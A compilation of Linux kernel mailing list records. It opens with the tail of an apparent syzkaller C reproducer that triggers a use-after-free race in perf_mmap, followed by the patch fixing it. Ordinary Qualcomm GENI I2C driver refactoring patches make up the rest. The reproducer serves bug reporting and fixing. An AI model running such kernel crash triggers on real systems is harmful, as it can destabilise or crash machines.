NONFAILING(*(uint64_t*)0x200000000038 = 0x29a);
NONFAILING(*(uint64_t*)0x200000000040 = 8);
NONFAILING(*(uint64_t*)0x200000000048 = 0x1800);
NONFAILING(*(uint64_t*)0x200000000050 = 7);
NONFAILING(*(uint32_t*)0x200000000058 = 0x10000);
NONFAILING(*(uint32_t*)0x20000000005c = 1);
NONFAILING(*(uint64_t*)0x200000000060 = 4);
NONFAILING(*(uint32_t*)0x200000000068 = 0xffffff7f);
NONFAILING(*(uint16_t*)0x20000000006c = 0xfffe);
NONFAILING(*(uint16_t*)0x20000000006e = 0);
NONFAILING(*(uint32_t*)0x200000000070 = 0x8000003);
NONFAILING(*(uint32_t*)0x200000000074 = 0);
NONFAILING(*(uint64_t*)0x200000000078 = 7);
res = syscall(__NR_perf_event_open, /*attr=*/0x200000000000ul, /*pid=*/0,
/*cpu=*/1ul, /*group=*/r[0], /*flags=PERF_FLAG_FD_OUTPUT*/ 2ul);
if (res != -1)
r[1] = res;
// mmap arguments: [
// addr: VMA[0x1000]
// len: len = 0x1000 (8 bytes)
// prot: mmap_prot = 0x100000b (8 bytes)
// flags: mmap_flags = 0x13 (8 bytes)
// fd: fd (resource)
// offset: intptr = 0x0 (8 bytes)
// ]
syscall(__NR_mmap, /*addr=*/0x200000186000ul, /*len=*/0x1000ul,
/*prot=PROT_GROWSDOWN|PROT_SEM|PROT_WRITE|PROT_READ*/ 0x100000bul,
/*flags=MAP_SHARED_VALIDATE|MAP_FIXED*/ 0x13ul, /*fd=*/r[1],
/*offset=*/0ul);
return 0;
}
|
From: Haocheng Yu <yuhaocheng035@gmail.com>
Syzkaller reported a refcount_t: addition on 0; use-after-free warning
in perf_mmap.
The issue is caused by a race condition between a failing mmap() setup
and a concurrent mmap() on a dependent event (e.g., using output
redirection).
In perf_mmap(), the ring_buffer (rb) is allocated and assigned to
event->rb with the mmap_mutex held. The mutex is then released to
perform map_range().
If map_range() fails, perf_mmap_close() is called to clean up.
However, since the mutex was dropped, another thread attaching to
this event (via inherited events or output redirection) can acquire
the mutex, observe the valid event->rb pointer, and attempt to
increment its reference count. If the cleanup path has already
dropped the reference count to zero, this results in a
use-after-free or refcount saturation warning.
Fix this by extending the scope of mmap_mutex to cover the
map_range() call. This ensures that the ring buffer initialization
and mapping (or cleanup on failure) happens atomically effectively,
preventing other threads from accessing a half-initialized or
dying ring buffer.
Reported-by: kernel test robot <lkp@intel.com>
Closes: https://lore.kernel.org/oe-kbuild-all/202602020208.m7KIjdzW-lkp@intel.com/
Signed-off-by: Haocheng Yu <yuhaocheng035@gmail.com>
---
kernel/events/core.c | 38 +++++++++++++++++++-------------------
1 file changed, 19 insertions(+), 19 deletions(-)
diff --git a/kernel/events/core.c b/kernel/events/core.c
index 2c35acc2722b..abefd1213582 100644
--- a/kernel/events/core.c
+++ b/kernel/events/core.c
@@ -7167,28 +7167,28 @@ static int perf_mmap(struct file *file, struct vm_area_struct *vma)
ret = perf_mmap_aux(vma, event, nr_pages);
if (ret)
return ret;
- }
- /*
- * Since pinned accounting is per vm we cannot allow fork() to copy our
- * vma.
- */
- vm_flags_set(vma, VM_DONTCOPY | VM_DONTEXPAND | VM_DONTDUMP);
- vma->vm_ops = &perf_mmap_vmops;
+ /*
+ * Since pinned accounting is per vm we cannot allow fork() to copy our
+ * vma.
+ */
+ vm_flags_set(vma, VM_DONTCOPY | VM_DONTEXPAND | VM_DONTDUMP);
+ vma->vm_ops = &perf_mmap_vmops;
- mapped = get_mapped(event, event_mapped);
- if (mapped)
- mapped(event, vma->vm_mm);
+ mapped = get_mapped(event, event_mapped);
+ if (mapped)
+ mapped(event, vma->vm_mm);
- /*
- * Try to map it into the page table. On fail, invoke
- * perf_mmap_close() to undo the above, as the callsite expects
- * full cleanup in this case and therefore does not invoke
- * vmops::close().
- */
- ret = map_range(event->rb, vma);
- if (ret)
- perf_mmap_close(vma);
+ /*
+ * Try to map it into the page table. On fail, invoke
+ * perf_mmap_close() to undo the above, as the callsite expects
+ * full cleanup in this case and therefore does not invoke
+ * vmops::close().
+ */
+ ret = map_range(event->rb, vma);
+ if (ret)
+ perf_mmap_close(vma);
+ }
return ret;
}
base-commit: 7d0a66e4bb9081d75c82ec4957c50034cb0ea449
--
2.51.0
|
{
"author": "yuhaocheng035@gmail.com",
"date": "Tue, 3 Feb 2026 00:20:56 +0800",
"thread_id": "CAAoXzSqHuQd7k9rp878YBG5gbChgOaProPQ6XBzKpy81JF5sKg@mail.gmail.com.mbox.gz"
}
|
lkml
|
[PATCH v4 00/13] Enable I2C on SA8255p Qualcomm platforms
|
The Qualcomm automotive SA8255p SoC relies on firmware to configure
platform resources, including clocks, interconnects and TLMM.
The driver requests resources operations over SCMI using power
and performance protocols.
The SCMI power protocol enables or disables resources like clocks,
interconnect paths, and TLMM (GPIOs) using runtime PM framework APIs,
such as resume/suspend, to control power states(on/off).
The SCMI performance protocol manages I2C frequency, with each
frequency rate represented by a performance level. The driver uses
geni_se_set_perf_opp() API to request the desired frequency rate..
As part of geni_se_set_perf_opp(), the OPP for the requested frequency
is obtained using dev_pm_opp_find_freq_floor() and the performance
level is set using dev_pm_opp_set_opp().
Praveen Talari (13):
soc: qcom: geni-se: Refactor geni_icc_get() and make qup-memory ICC
path optional
soc: qcom: geni-se: Add geni_icc_set_bw_ab() function
soc: qcom: geni-se: Introduce helper API for resource initialization
soc: qcom: geni-se: Handle core clk in geni_se_clks_off() and
geni_se_clks_on()
soc: qcom: geni-se: Add resources activation/deactivation helpers
soc: qcom: geni-se: Introduce helper API for attaching power domains
soc: qcom: geni-se: Introduce helper APIs for performance control
dt-bindings: i2c: Describe SA8255p
i2c: qcom-geni: Isolate serial engine setup
i2c: qcom-geni: Move resource initialization to separate function
i2c: qcom-geni: Use resources helper APIs in runtime PM functions
i2c: qcom-geni: Store of_device_id data in driver private struct
i2c: qcom-geni: Enable I2C on SA8255p Qualcomm platforms
---
v3->v4
- Added a new patch(4/13) to handle core clk as part of
geni_se_clks_off/on().
---
.../bindings/i2c/qcom,sa8255p-geni-i2c.yaml | 64 ++++
drivers/i2c/busses/i2c-qcom-geni.c | 303 +++++++++---------
drivers/soc/qcom/qcom-geni-se.c | 265 +++++++++++++--
include/linux/soc/qcom/geni-se.h | 19 ++
4 files changed, 476 insertions(+), 175 deletions(-)
create mode 100644 Documentation/devicetree/bindings/i2c/qcom,sa8255p-geni-i2c.yaml
base-commit: 193579fe01389bc21aff0051d13f24e8ea95b47d
--
2.34.1
|
The "qup-memory" interconnect path is optional and may not be defined
in all device trees. Unroll the loop-based ICC path initialization to
allow specific error handling for each path type.
The "qup-core" and "qup-config" paths remain mandatory and will fail
probe if missing, while "qup-memory" is now handled as optional and
skipped when not present in the device tree.
Co-developed-by: Konrad Dybcio <konrad.dybcio@oss.qualcomm.com>
Signed-off-by: Konrad Dybcio <konrad.dybcio@oss.qualcomm.com>
Signed-off-by: Praveen Talari <praveen.talari@oss.qualcomm.com>
---
v1->v2:
Bjorn:
- Updated commit text.
- Used local variable for more readable.
---
drivers/soc/qcom/qcom-geni-se.c | 36 +++++++++++++++++----------------
1 file changed, 19 insertions(+), 17 deletions(-)
diff --git a/drivers/soc/qcom/qcom-geni-se.c b/drivers/soc/qcom/qcom-geni-se.c
index cd1779b6a91a..b6167b968ef6 100644
--- a/drivers/soc/qcom/qcom-geni-se.c
+++ b/drivers/soc/qcom/qcom-geni-se.c
@@ -899,30 +899,32 @@ EXPORT_SYMBOL_GPL(geni_se_rx_dma_unprep);
int geni_icc_get(struct geni_se *se, const char *icc_ddr)
{
- int i, err;
- const char *icc_names[] = {"qup-core", "qup-config", icc_ddr};
+ struct geni_icc_path *icc_paths = se->icc_paths;
if (has_acpi_companion(se->dev))
return 0;
- for (i = 0; i < ARRAY_SIZE(se->icc_paths); i++) {
- if (!icc_names[i])
- continue;
-
- se->icc_paths[i].path = devm_of_icc_get(se->dev, icc_names[i]);
- if (IS_ERR(se->icc_paths[i].path))
- goto err;
+ icc_paths[GENI_TO_CORE].path = devm_of_icc_get(se->dev, "qup-core");
+ if (IS_ERR(icc_paths[GENI_TO_CORE].path))
+ return dev_err_probe(se->dev, PTR_ERR(icc_paths[GENI_TO_CORE].path),
+ "Failed to get 'qup-core' ICC path\n");
+
+ icc_paths[CPU_TO_GENI].path = devm_of_icc_get(se->dev, "qup-config");
+ if (IS_ERR(icc_paths[CPU_TO_GENI].path))
+ return dev_err_probe(se->dev, PTR_ERR(icc_paths[CPU_TO_GENI].path),
+ "Failed to get 'qup-config' ICC path\n");
+
+ /* The DDR path is optional, depending on protocol and hw capabilities */
+ icc_paths[GENI_TO_DDR].path = devm_of_icc_get(se->dev, "qup-memory");
+ if (IS_ERR(icc_paths[GENI_TO_DDR].path)) {
+ if (PTR_ERR(icc_paths[GENI_TO_DDR].path) == -ENODATA)
+ icc_paths[GENI_TO_DDR].path = NULL;
+ else
+ return dev_err_probe(se->dev, PTR_ERR(icc_paths[GENI_TO_DDR].path),
+ "Failed to get 'qup-memory' ICC path\n");
}
return 0;
-
-err:
- err = PTR_ERR(se->icc_paths[i].path);
- if (err != -EPROBE_DEFER)
- dev_err_ratelimited(se->dev, "Failed to get ICC path '%s': %d\n",
- icc_names[i], err);
- return err;
-
}
EXPORT_SYMBOL_GPL(geni_icc_get);
--
2.34.1
|
{
"author": "Praveen Talari <praveen.talari@oss.qualcomm.com>",
"date": "Mon, 2 Feb 2026 23:39:10 +0530",
"thread_id": "20260202180922.1692428-8-praveen.talari@oss.qualcomm.com.mbox.gz"
}
|
lkml
|
[PATCH v4 00/13] Enable I2C on SA8255p Qualcomm platforms
|
The Qualcomm automotive SA8255p SoC relies on firmware to configure
platform resources, including clocks, interconnects and TLMM.
The driver requests resources operations over SCMI using power
and performance protocols.
The SCMI power protocol enables or disables resources like clocks,
interconnect paths, and TLMM (GPIOs) using runtime PM framework APIs,
such as resume/suspend, to control power states(on/off).
The SCMI performance protocol manages I2C frequency, with each
frequency rate represented by a performance level. The driver uses
geni_se_set_perf_opp() API to request the desired frequency rate..
As part of geni_se_set_perf_opp(), the OPP for the requested frequency
is obtained using dev_pm_opp_find_freq_floor() and the performance
level is set using dev_pm_opp_set_opp().
Praveen Talari (13):
soc: qcom: geni-se: Refactor geni_icc_get() and make qup-memory ICC
path optional
soc: qcom: geni-se: Add geni_icc_set_bw_ab() function
soc: qcom: geni-se: Introduce helper API for resource initialization
soc: qcom: geni-se: Handle core clk in geni_se_clks_off() and
geni_se_clks_on()
soc: qcom: geni-se: Add resources activation/deactivation helpers
soc: qcom: geni-se: Introduce helper API for attaching power domains
soc: qcom: geni-se: Introduce helper APIs for performance control
dt-bindings: i2c: Describe SA8255p
i2c: qcom-geni: Isolate serial engine setup
i2c: qcom-geni: Move resource initialization to separate function
i2c: qcom-geni: Use resources helper APIs in runtime PM functions
i2c: qcom-geni: Store of_device_id data in driver private struct
i2c: qcom-geni: Enable I2C on SA8255p Qualcomm platforms
---
v3->v4
- Added a new patch(4/13) to handle core clk as part of
geni_se_clks_off/on().
---
.../bindings/i2c/qcom,sa8255p-geni-i2c.yaml | 64 ++++
drivers/i2c/busses/i2c-qcom-geni.c | 303 +++++++++---------
drivers/soc/qcom/qcom-geni-se.c | 265 +++++++++++++--
include/linux/soc/qcom/geni-se.h | 19 ++
4 files changed, 476 insertions(+), 175 deletions(-)
create mode 100644 Documentation/devicetree/bindings/i2c/qcom,sa8255p-geni-i2c.yaml
base-commit: 193579fe01389bc21aff0051d13f24e8ea95b47d
--
2.34.1
|
Add a new function geni_icc_set_bw_ab() that allows callers to set
average bandwidth values for all ICC (Interconnect) paths in a single
call. This function takes separate parameters for core, config, and DDR
average bandwidth values and applies them to the respective ICC paths.
This provides a more convenient API for drivers that need to configure
specific average bandwidth values.
Co-developed-by: Konrad Dybcio <konrad.dybcio@oss.qualcomm.com>
Signed-off-by: Konrad Dybcio <konrad.dybcio@oss.qualcomm.com>
Signed-off-by: Praveen Talari <praveen.talari@oss.qualcomm.com>
---
drivers/soc/qcom/qcom-geni-se.c | 22 ++++++++++++++++++++++
include/linux/soc/qcom/geni-se.h | 1 +
2 files changed, 23 insertions(+)
diff --git a/drivers/soc/qcom/qcom-geni-se.c b/drivers/soc/qcom/qcom-geni-se.c
index b6167b968ef6..b0542f836453 100644
--- a/drivers/soc/qcom/qcom-geni-se.c
+++ b/drivers/soc/qcom/qcom-geni-se.c
@@ -946,6 +946,28 @@ int geni_icc_set_bw(struct geni_se *se)
}
EXPORT_SYMBOL_GPL(geni_icc_set_bw);
+/**
+ * geni_icc_set_bw_ab() - Set average bandwidth for all ICC paths and apply
+ * @se: Pointer to the concerned serial engine.
+ * @core_ab: Average bandwidth in kBps for GENI_TO_CORE path.
+ * @cfg_ab: Average bandwidth in kBps for CPU_TO_GENI path.
+ * @ddr_ab: Average bandwidth in kBps for GENI_TO_DDR path.
+ *
+ * Sets bandwidth values for all ICC paths and applies them. DDR path is
+ * optional and only set if it exists.
+ *
+ * Return: 0 on success, negative error code on failure.
+ */
+int geni_icc_set_bw_ab(struct geni_se *se, u32 core_ab, u32 cfg_ab, u32 ddr_ab)
+{
+ se->icc_paths[GENI_TO_CORE].avg_bw = core_ab;
+ se->icc_paths[CPU_TO_GENI].avg_bw = cfg_ab;
+ se->icc_paths[GENI_TO_DDR].avg_bw = ddr_ab;
+
+ return geni_icc_set_bw(se);
+}
+EXPORT_SYMBOL_GPL(geni_icc_set_bw_ab);
+
void geni_icc_set_tag(struct geni_se *se, u32 tag)
{
int i;
diff --git a/include/linux/soc/qcom/geni-se.h b/include/linux/soc/qcom/geni-se.h
index 0a984e2579fe..980aabea2157 100644
--- a/include/linux/soc/qcom/geni-se.h
+++ b/include/linux/soc/qcom/geni-se.h
@@ -528,6 +528,7 @@ void geni_se_rx_dma_unprep(struct geni_se *se, dma_addr_t iova, size_t len);
int geni_icc_get(struct geni_se *se, const char *icc_ddr);
int geni_icc_set_bw(struct geni_se *se);
+int geni_icc_set_bw_ab(struct geni_se *se, u32 core_ab, u32 cfg_ab, u32 ddr_ab);
void geni_icc_set_tag(struct geni_se *se, u32 tag);
int geni_icc_enable(struct geni_se *se);
--
2.34.1
|
{
"author": "Praveen Talari <praveen.talari@oss.qualcomm.com>",
"date": "Mon, 2 Feb 2026 23:39:11 +0530",
"thread_id": "20260202180922.1692428-8-praveen.talari@oss.qualcomm.com.mbox.gz"
}
|
lkml
|
[PATCH v4 00/13] Enable I2C on SA8255p Qualcomm platforms
|
The Qualcomm automotive SA8255p SoC relies on firmware to configure
platform resources, including clocks, interconnects and TLMM.
The driver requests resources operations over SCMI using power
and performance protocols.
The SCMI power protocol enables or disables resources like clocks,
interconnect paths, and TLMM (GPIOs) using runtime PM framework APIs,
such as resume/suspend, to control power states(on/off).
The SCMI performance protocol manages I2C frequency, with each
frequency rate represented by a performance level. The driver uses
geni_se_set_perf_opp() API to request the desired frequency rate..
As part of geni_se_set_perf_opp(), the OPP for the requested frequency
is obtained using dev_pm_opp_find_freq_floor() and the performance
level is set using dev_pm_opp_set_opp().
Praveen Talari (13):
soc: qcom: geni-se: Refactor geni_icc_get() and make qup-memory ICC
path optional
soc: qcom: geni-se: Add geni_icc_set_bw_ab() function
soc: qcom: geni-se: Introduce helper API for resource initialization
soc: qcom: geni-se: Handle core clk in geni_se_clks_off() and
geni_se_clks_on()
soc: qcom: geni-se: Add resources activation/deactivation helpers
soc: qcom: geni-se: Introduce helper API for attaching power domains
soc: qcom: geni-se: Introduce helper APIs for performance control
dt-bindings: i2c: Describe SA8255p
i2c: qcom-geni: Isolate serial engine setup
i2c: qcom-geni: Move resource initialization to separate function
i2c: qcom-geni: Use resources helper APIs in runtime PM functions
i2c: qcom-geni: Store of_device_id data in driver private struct
i2c: qcom-geni: Enable I2C on SA8255p Qualcomm platforms
---
v3->v4
- Added a new patch(4/13) to handle core clk as part of
geni_se_clks_off/on().
---
.../bindings/i2c/qcom,sa8255p-geni-i2c.yaml | 64 ++++
drivers/i2c/busses/i2c-qcom-geni.c | 303 +++++++++---------
drivers/soc/qcom/qcom-geni-se.c | 265 +++++++++++++--
include/linux/soc/qcom/geni-se.h | 19 ++
4 files changed, 476 insertions(+), 175 deletions(-)
create mode 100644 Documentation/devicetree/bindings/i2c/qcom,sa8255p-geni-i2c.yaml
base-commit: 193579fe01389bc21aff0051d13f24e8ea95b47d
--
2.34.1
|
The GENI Serial Engine drivers (I2C, SPI, and SERIAL) currently duplicate
code for initializing shared resources such as clocks and interconnect
paths.
Introduce a new helper API, geni_se_resources_init(), to centralize this
initialization logic, improving modularity and simplifying the probe
function.
Signed-off-by: Praveen Talari <praveen.talari@oss.qualcomm.com>
---
v1 -> v2:
- Updated proper return value for devm_pm_opp_set_clkname()
---
drivers/soc/qcom/qcom-geni-se.c | 47 ++++++++++++++++++++++++++++++++
include/linux/soc/qcom/geni-se.h | 6 ++++
2 files changed, 53 insertions(+)
diff --git a/drivers/soc/qcom/qcom-geni-se.c b/drivers/soc/qcom/qcom-geni-se.c
index b0542f836453..75e722cd1a94 100644
--- a/drivers/soc/qcom/qcom-geni-se.c
+++ b/drivers/soc/qcom/qcom-geni-se.c
@@ -19,6 +19,7 @@
#include <linux/of_platform.h>
#include <linux/pinctrl/consumer.h>
#include <linux/platform_device.h>
+#include <linux/pm_opp.h>
#include <linux/soc/qcom/geni-se.h>
/**
@@ -1012,6 +1013,52 @@ int geni_icc_disable(struct geni_se *se)
}
EXPORT_SYMBOL_GPL(geni_icc_disable);
+/**
+ * geni_se_resources_init() - Initialize resources for a GENI SE device.
+ * @se: Pointer to the geni_se structure representing the GENI SE device.
+ *
+ * This function initializes various resources required by the GENI Serial Engine
+ * (SE) device, including clock resources (core and SE clocks), interconnect
+ * paths for communication.
+ * It retrieves optional and mandatory clock resources, adds an OF-based
+ * operating performance point (OPP) table, and sets up interconnect paths
+ * with default bandwidths. The function also sets a flag (`has_opp`) to
+ * indicate whether OPP support is available for the device.
+ *
+ * Return: 0 on success, or a negative errno on failure.
+ */
+int geni_se_resources_init(struct geni_se *se)
+{
+ int ret;
+
+ se->core_clk = devm_clk_get_optional(se->dev, "core");
+ if (IS_ERR(se->core_clk))
+ return dev_err_probe(se->dev, PTR_ERR(se->core_clk),
+ "Failed to get optional core clk\n");
+
+ se->clk = devm_clk_get(se->dev, "se");
+ if (IS_ERR(se->clk) && !has_acpi_companion(se->dev))
+ return dev_err_probe(se->dev, PTR_ERR(se->clk),
+ "Failed to get SE clk\n");
+
+ ret = devm_pm_opp_set_clkname(se->dev, "se");
+ if (ret)
+ return ret;
+
+ ret = devm_pm_opp_of_add_table(se->dev);
+ if (ret && ret != -ENODEV)
+ return dev_err_probe(se->dev, ret, "Failed to add OPP table\n");
+
+ se->has_opp = (ret == 0);
+
+ ret = geni_icc_get(se, "qup-memory");
+ if (ret)
+ return ret;
+
+ return geni_icc_set_bw_ab(se, GENI_DEFAULT_BW, GENI_DEFAULT_BW, GENI_DEFAULT_BW);
+}
+EXPORT_SYMBOL_GPL(geni_se_resources_init);
+
/**
* geni_find_protocol_fw() - Locate and validate SE firmware for a protocol.
* @dev: Pointer to the device structure.
diff --git a/include/linux/soc/qcom/geni-se.h b/include/linux/soc/qcom/geni-se.h
index 980aabea2157..c182dd0f0bde 100644
--- a/include/linux/soc/qcom/geni-se.h
+++ b/include/linux/soc/qcom/geni-se.h
@@ -60,18 +60,22 @@ struct geni_icc_path {
* @dev: Pointer to the Serial Engine device
* @wrapper: Pointer to the parent QUP Wrapper core
* @clk: Handle to the core serial engine clock
+ * @core_clk: Auxiliary clock, which may be required by a protocol
* @num_clk_levels: Number of valid clock levels in clk_perf_tbl
* @clk_perf_tbl: Table of clock frequency input to serial engine clock
* @icc_paths: Array of ICC paths for SE
+ * @has_opp: Indicates if OPP is supported
*/
struct geni_se {
void __iomem *base;
struct device *dev;
struct geni_wrapper *wrapper;
struct clk *clk;
+ struct clk *core_clk;
unsigned int num_clk_levels;
unsigned long *clk_perf_tbl;
struct geni_icc_path icc_paths[3];
+ bool has_opp;
};
/* Common SE registers */
@@ -535,6 +539,8 @@ int geni_icc_enable(struct geni_se *se);
int geni_icc_disable(struct geni_se *se);
+int geni_se_resources_init(struct geni_se *se);
+
int geni_load_se_firmware(struct geni_se *se, enum geni_se_protocol_type protocol);
#endif
#endif
--
2.34.1
|
{
"author": "Praveen Talari <praveen.talari@oss.qualcomm.com>",
"date": "Mon, 2 Feb 2026 23:39:12 +0530",
"thread_id": "20260202180922.1692428-8-praveen.talari@oss.qualcomm.com.mbox.gz"
}
|
lkml
|
[PATCH v4 00/13] Enable I2C on SA8255p Qualcomm platforms
|
The Qualcomm automotive SA8255p SoC relies on firmware to configure
platform resources, including clocks, interconnects and TLMM.
The driver requests resources operations over SCMI using power
and performance protocols.
The SCMI power protocol enables or disables resources like clocks,
interconnect paths, and TLMM (GPIOs) using runtime PM framework APIs,
such as resume/suspend, to control power states(on/off).
The SCMI performance protocol manages I2C frequency, with each
frequency rate represented by a performance level. The driver uses
geni_se_set_perf_opp() API to request the desired frequency rate..
As part of geni_se_set_perf_opp(), the OPP for the requested frequency
is obtained using dev_pm_opp_find_freq_floor() and the performance
level is set using dev_pm_opp_set_opp().
Praveen Talari (13):
soc: qcom: geni-se: Refactor geni_icc_get() and make qup-memory ICC
path optional
soc: qcom: geni-se: Add geni_icc_set_bw_ab() function
soc: qcom: geni-se: Introduce helper API for resource initialization
soc: qcom: geni-se: Handle core clk in geni_se_clks_off() and
geni_se_clks_on()
soc: qcom: geni-se: Add resources activation/deactivation helpers
soc: qcom: geni-se: Introduce helper API for attaching power domains
soc: qcom: geni-se: Introduce helper APIs for performance control
dt-bindings: i2c: Describe SA8255p
i2c: qcom-geni: Isolate serial engine setup
i2c: qcom-geni: Move resource initialization to separate function
i2c: qcom-geni: Use resources helper APIs in runtime PM functions
i2c: qcom-geni: Store of_device_id data in driver private struct
i2c: qcom-geni: Enable I2C on SA8255p Qualcomm platforms
---
v3->v4
- Added a new patch(4/13) to handle core clk as part of
geni_se_clks_off/on().
---
.../bindings/i2c/qcom,sa8255p-geni-i2c.yaml | 64 ++++
drivers/i2c/busses/i2c-qcom-geni.c | 303 +++++++++---------
drivers/soc/qcom/qcom-geni-se.c | 265 +++++++++++++--
include/linux/soc/qcom/geni-se.h | 19 ++
4 files changed, 476 insertions(+), 175 deletions(-)
create mode 100644 Documentation/devicetree/bindings/i2c/qcom,sa8255p-geni-i2c.yaml
base-commit: 193579fe01389bc21aff0051d13f24e8ea95b47d
--
2.34.1
|
Currently, core clk is handled individually in protocol drivers like
the I2C driver. Move this clock management to the common clock APIs
(geni_se_clks_on/off) that are already present in the common GENI SE
driver to maintain consistency across all protocol drivers.
Core clk is now properly managed alongside the other clocks (se->clk
and wrapper clocks) in the fundamental clock control functions,
eliminating the need for individual protocol drivers to handle this
clock separately.
Signed-off-by: Praveen Talari <praveen.talari@oss.qualcomm.com>
---
drivers/soc/qcom/qcom-geni-se.c | 14 +++++++++++++-
1 file changed, 13 insertions(+), 1 deletion(-)
diff --git a/drivers/soc/qcom/qcom-geni-se.c b/drivers/soc/qcom/qcom-geni-se.c
index 75e722cd1a94..2e41595ff912 100644
--- a/drivers/soc/qcom/qcom-geni-se.c
+++ b/drivers/soc/qcom/qcom-geni-se.c
@@ -583,6 +583,7 @@ static void geni_se_clks_off(struct geni_se *se)
clk_disable_unprepare(se->clk);
clk_bulk_disable_unprepare(wrapper->num_clks, wrapper->clks);
+ clk_disable_unprepare(se->core_clk);
}
/**
@@ -619,7 +620,18 @@ static int geni_se_clks_on(struct geni_se *se)
ret = clk_prepare_enable(se->clk);
if (ret)
- clk_bulk_disable_unprepare(wrapper->num_clks, wrapper->clks);
+ goto err_bulk_clks;
+
+ ret = clk_prepare_enable(se->core_clk);
+ if (ret)
+ goto err_se_clk;
+
+ return 0;
+
+err_se_clk:
+ clk_disable_unprepare(se->clk);
+err_bulk_clks:
+ clk_bulk_disable_unprepare(wrapper->num_clks, wrapper->clks);
return ret;
}
--
2.34.1
|
{
"author": "Praveen Talari <praveen.talari@oss.qualcomm.com>",
"date": "Mon, 2 Feb 2026 23:39:13 +0530",
"thread_id": "20260202180922.1692428-8-praveen.talari@oss.qualcomm.com.mbox.gz"
}
|
lkml
|
[PATCH v4 00/13] Enable I2C on SA8255p Qualcomm platforms
|
The Qualcomm automotive SA8255p SoC relies on firmware to configure
platform resources, including clocks, interconnects and TLMM.
The driver requests resources operations over SCMI using power
and performance protocols.
The SCMI power protocol enables or disables resources like clocks,
interconnect paths, and TLMM (GPIOs) using runtime PM framework APIs,
such as resume/suspend, to control power states(on/off).
The SCMI performance protocol manages I2C frequency, with each
frequency rate represented by a performance level. The driver uses
geni_se_set_perf_opp() API to request the desired frequency rate..
As part of geni_se_set_perf_opp(), the OPP for the requested frequency
is obtained using dev_pm_opp_find_freq_floor() and the performance
level is set using dev_pm_opp_set_opp().
Praveen Talari (13):
soc: qcom: geni-se: Refactor geni_icc_get() and make qup-memory ICC
path optional
soc: qcom: geni-se: Add geni_icc_set_bw_ab() function
soc: qcom: geni-se: Introduce helper API for resource initialization
soc: qcom: geni-se: Handle core clk in geni_se_clks_off() and
geni_se_clks_on()
soc: qcom: geni-se: Add resources activation/deactivation helpers
soc: qcom: geni-se: Introduce helper API for attaching power domains
soc: qcom: geni-se: Introduce helper APIs for performance control
dt-bindings: i2c: Describe SA8255p
i2c: qcom-geni: Isolate serial engine setup
i2c: qcom-geni: Move resource initialization to separate function
i2c: qcom-geni: Use resources helper APIs in runtime PM functions
i2c: qcom-geni: Store of_device_id data in driver private struct
i2c: qcom-geni: Enable I2C on SA8255p Qualcomm platforms
---
v3->v4
- Added a new patch(4/13) to handle core clk as part of
geni_se_clks_off/on().
---
.../bindings/i2c/qcom,sa8255p-geni-i2c.yaml | 64 ++++
drivers/i2c/busses/i2c-qcom-geni.c | 303 +++++++++---------
drivers/soc/qcom/qcom-geni-se.c | 265 +++++++++++++--
include/linux/soc/qcom/geni-se.h | 19 ++
4 files changed, 476 insertions(+), 175 deletions(-)
create mode 100644 Documentation/devicetree/bindings/i2c/qcom,sa8255p-geni-i2c.yaml
base-commit: 193579fe01389bc21aff0051d13f24e8ea95b47d
--
2.34.1
|
The GENI SE protocol drivers (I2C, SPI, UART) implement similar resource
activation/deactivation sequences independently, leading to code
duplication.
Introduce geni_se_resources_activate()/geni_se_resources_deactivate() to
power on/off resources.The activate function enables ICC, clocks, and TLMM
whereas the deactivate function disables resources in reverse order
including OPP rate reset, clocks, ICC and TLMM.
Signed-off-by: Praveen Talari <praveen.talari@oss.qualcomm.com>
---
v3 -> v4
Konrad
- Removed core clk.
v2 -> v3
- Added export symbol for new APIs.
v1 -> v2
Bjorn
- Updated commit message based code changes.
- Removed geni_se_resource_state() API.
- Utilized code snippet from geni_se_resources_off()
---
drivers/soc/qcom/qcom-geni-se.c | 67 ++++++++++++++++++++++++++++++++
include/linux/soc/qcom/geni-se.h | 4 ++
2 files changed, 71 insertions(+)
diff --git a/drivers/soc/qcom/qcom-geni-se.c b/drivers/soc/qcom/qcom-geni-se.c
index 2e41595ff912..17ab5bbeb621 100644
--- a/drivers/soc/qcom/qcom-geni-se.c
+++ b/drivers/soc/qcom/qcom-geni-se.c
@@ -1025,6 +1025,73 @@ int geni_icc_disable(struct geni_se *se)
}
EXPORT_SYMBOL_GPL(geni_icc_disable);
+/**
+ * geni_se_resources_deactivate() - Deactivate GENI SE device resources
+ * @se: Pointer to the geni_se structure
+ *
+ * Deactivates device resources for power saving: OPP rate to 0, pin control
+ * to sleep state, turns off clocks, and disables interconnect. Skips ACPI devices.
+ *
+ * Return: 0 on success, negative error code on failure
+ */
+int geni_se_resources_deactivate(struct geni_se *se)
+{
+ int ret;
+
+ if (has_acpi_companion(se->dev))
+ return 0;
+
+ if (se->has_opp)
+ dev_pm_opp_set_rate(se->dev, 0);
+
+ ret = pinctrl_pm_select_sleep_state(se->dev);
+ if (ret)
+ return ret;
+
+ geni_se_clks_off(se);
+
+ return geni_icc_disable(se);
+}
+EXPORT_SYMBOL_GPL(geni_se_resources_deactivate);
+
+/**
+ * geni_se_resources_activate() - Activate GENI SE device resources
+ * @se: Pointer to the geni_se structure
+ *
+ * Activates device resources for operation: enables interconnect, prepares clocks,
+ * and sets pin control to default state. Includes error cleanup. Skips ACPI devices.
+ *
+ * Return: 0 on success, negative error code on failure
+ */
+int geni_se_resources_activate(struct geni_se *se)
+{
+ int ret;
+
+ if (has_acpi_companion(se->dev))
+ return 0;
+
+ ret = geni_icc_enable(se);
+ if (ret)
+ return ret;
+
+ ret = geni_se_clks_on(se);
+ if (ret)
+ goto out_icc_disable;
+
+ ret = pinctrl_pm_select_default_state(se->dev);
+ if (ret) {
+ geni_se_clks_off(se);
+ goto out_icc_disable;
+ }
+
+ return ret;
+
+out_icc_disable:
+ geni_icc_disable(se);
+ return ret;
+}
+EXPORT_SYMBOL_GPL(geni_se_resources_activate);
+
/**
* geni_se_resources_init() - Initialize resources for a GENI SE device.
* @se: Pointer to the geni_se structure representing the GENI SE device.
diff --git a/include/linux/soc/qcom/geni-se.h b/include/linux/soc/qcom/geni-se.h
index c182dd0f0bde..36a68149345c 100644
--- a/include/linux/soc/qcom/geni-se.h
+++ b/include/linux/soc/qcom/geni-se.h
@@ -541,6 +541,10 @@ int geni_icc_disable(struct geni_se *se);
int geni_se_resources_init(struct geni_se *se);
+int geni_se_resources_activate(struct geni_se *se);
+
+int geni_se_resources_deactivate(struct geni_se *se);
+
int geni_load_se_firmware(struct geni_se *se, enum geni_se_protocol_type protocol);
#endif
#endif
--
2.34.1
|
{
